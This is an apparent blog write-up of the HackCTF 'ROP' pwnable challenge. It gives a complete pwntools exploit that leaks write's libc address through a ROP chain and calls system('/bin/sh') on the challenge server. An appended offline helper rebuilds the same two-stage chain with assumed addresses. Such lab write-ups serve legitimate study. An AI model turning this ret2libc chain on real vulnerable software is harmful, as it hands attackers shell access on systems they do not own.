Wargame & CTF/Pwnable

[HackCTF] ROP (300) write-up

m3r0n4 2020. 12. 24. 02:28

Plain x86 ROP, nothing fancy; a quick one.

1. Exploit

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3021)
#p = process('./rop')
e = ELF('./rop')
#libc = e.libc                       # local libc, for testing with process()
libc = ELF('libc.so.6')              # the libc shipped with the challenge

write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x08048509                    # pop; pop; pop; ret, cleans write's 3 args

# Stage 1: overflow to the saved EIP, call write(1, &write@got, 4), then
# return into main so we get a second overflow for the real payload.
payload = b"A" * (0x88 + 4)          # buffer + saved EBP
payload += p32(write_plt)
payload += p32(pppr)                 # write's return address: pops the 3 args
payload += p32(1)                    # fd = stdout
payload += p32(write_got)            # buf = address of write's GOT entry
payload += p32(4)                    # count = one 32-bit pointer
payload += p32(e.symbols['main'])    # run main again

p.sendline(payload)

write_addr = u32(p.recv(4))          # the 4 leaked bytes: write's libc address
log.success(hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: classic ret2libc, system("/bin/sh") with a dummy return address
payload = b"A" * (0x88 + 4)
payload += p32(system_addr)
payload += b"AAAA"                   # return address after system (never used)
payload += p32(binsh)

p.sendline(payload)

p.interactive()

 

The libc is simply handed to us, so leak a libc address with write() and compute the rest from it: write(1, &write@got, 4) prints the resolved address of write from the GOT, subtracting libc's own write offset gives the libc base, and system and "/bin/sh" are just offsets from that base. The pop;pop;pop;ret gadget is needed because write takes three arguments that have to be popped before returning into main for the second overflow; from there it is plain RTL with system("/bin/sh").
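The two stages above, written out as an added example that is not the write-up's exploit: plain Python with struct instead of pwntools and no network, so it can be run offline to inspect the chain layout. Every address and libc offset in it is a made-up assumption for illustration; only the 0x88 + 4 distance to the saved return address and the idea of a pop;pop;pop;ret gadget come from the page. It generalizes the stage-1 frame to any argument count given a matching pop-N;ret gadget, and sanity-checks the computed libc base for page alignment, which catches the usual "wrong libc build" mistake before the second payload is sent.

```python
import struct

# Added example, not the write-up's exploit. Every address and libc offset
# below is an ASSUMED value for illustration; only the 0x88 + 4 distance to
# the saved return address comes from the page.
OFFSET_TO_RET = 0x88 + 4


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


def call_then(func, args, pop_ret_gadgets, ret_to):
    """One x86 ROP frame that calls func(*args) and then continues at ret_to.
    Layout: [func][popN_ret][arg0]...[argN-1][ret_to]. func sees popN_ret as
    its return address and the args where the cdecl ABI expects them; the
    gadget then pops the N argument slots and 'ret's into ret_to."""
    gadget = pop_ret_gadgets.get(len(args))
    if gadget is None:
        raise ValueError("no %d-pop; ret gadget available" % len(args))
    return p32(func) + p32(gadget) + b"".join(p32(a) for a in args) + p32(ret_to)


def leak_chain(write_plt, write_got, gadgets, ret_to):
    """Stage 1: overflow, write(1, &write@got, 4) to stdout, then rerun main."""
    return b"A" * OFFSET_TO_RET + call_then(write_plt, [1, write_got, 4], gadgets, ret_to)


def libc_base_from_leak(leaked4, write_offset):
    """Stage 2 arithmetic. libc is mapped page-aligned, so a base that is not
    a multiple of 0x1000 means a wrong libc build or a mis-parsed leak."""
    base = u32(leaked4) - write_offset
    if base & 0xFFF:
        raise ValueError("libc base 0x%x is not page-aligned" % base)
    return base


def ret2libc_chain(system_addr, binsh_addr):
    """Final frame: [system][fake return][&"/bin/sh"]. system never needs to
    return, so no cleanup gadget; esp+4 at entry is the first argument slot."""
    return b"A" * OFFSET_TO_RET + p32(system_addr) + b"AAAA" + p32(binsh_addr)


def chain_slots(chain):
    """Decode the 32-bit words after the padding, for inspection."""
    words = chain[OFFSET_TO_RET:]
    return [u32(words[i:i + 4]) for i in range(0, len(words), 4)]


# Constructed scenario (assumed values, not from the challenge binary/libc).
WRITE_PLT, WRITE_GOT, MAIN = 0x08048370, 0x0804A01C, 0x0804862B
GADGETS = {3: 0x08048509}  # pop; pop; pop; ret (only a 3-pop gadget assumed)
LIBC_WRITE, LIBC_SYSTEM, LIBC_BINSH = 0x000D5C10, 0x0003ADA0, 0x0015BA0B
FAKE_LIBC_BASE = 0xF7E10000


def demo():
    stage1 = leak_chain(WRITE_PLT, WRITE_GOT, GADGETS, MAIN)
    # Simulate the 4 bytes the target's write(1, &write@got, 4) would print.
    leaked = p32(FAKE_LIBC_BASE + LIBC_WRITE)
    base = libc_base_from_leak(leaked, LIBC_WRITE)
    stage2 = ret2libc_chain(base + LIBC_SYSTEM, base + LIBC_BINSH)
    return base, chain_slots(stage1), chain_slots(stage2)


if __name__ == "__main__":
    base, s1, s2 = demo()
    print("libc base 0x%x" % base)
    print("stage1 slots:", [hex(w) for w in s1])
    print("stage2 slots:", [hex(w) for w in s2])
```

Swap the assumed constants for the real `e.plt['write']`, `e.got['write']`, gadget and libc symbol values and feed `leak_chain()` / `ret2libc_chain()` to `sendline()` to get back the write-up's exploit; `chain_slots()` is only there to eyeball the frame before sending it.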
